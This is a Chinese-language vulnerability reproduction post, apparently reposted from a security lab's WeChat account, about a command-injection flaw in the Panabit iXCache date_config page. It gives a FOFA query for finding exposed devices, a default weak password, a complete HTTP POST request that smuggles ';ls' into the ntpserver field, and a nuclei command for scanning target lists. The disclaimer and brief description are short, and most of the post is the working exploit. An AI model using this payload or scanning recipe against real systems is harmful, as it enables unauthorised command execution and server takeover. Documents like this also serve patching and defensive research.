0x01 漏洞描述
panabit缓存加速产品是一款基于派网公司自研的操作系统(PanaOS)上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点,可缓存丰富的资源,目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式,满足不同级别的用户需求。panabit iXCache系统date_config存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
0x02 漏洞复现
fofa:title="iXCache"
1.弱口令admin-ixcache登录,通过漏洞执行ls命令,得到回显(每次发包需要在登录处重新获取一次cookie)
POST
/cgi-bin/Maintain/date_config
HTTP/1.1
Host
: {{Hostname}}
Cookie
: pauser_1626709857_644740=paonline_admin_48217_16289319551;Path=/;
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 107
ntpserver
=
0.0
.
0.0
;ls&year=
2021
&month=
08
&day=
14
&hour=
17
&minute=
04
&second=
50
&tz=Asiz&bcy=Shanghai&ifname=fxp1
2.nuclei验证脚本已发表于知识星球
nuclei
.exe
-t
panabit-ixcache-date-config-rce
.yaml
-l
subs
.txt
-stats
(注:本文章为技术分享,禁止任何非授权攻击行为)
原文始发于微信公众号(融云攻防实验室):漏洞复现 Panabit iXCache date_config 后台命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论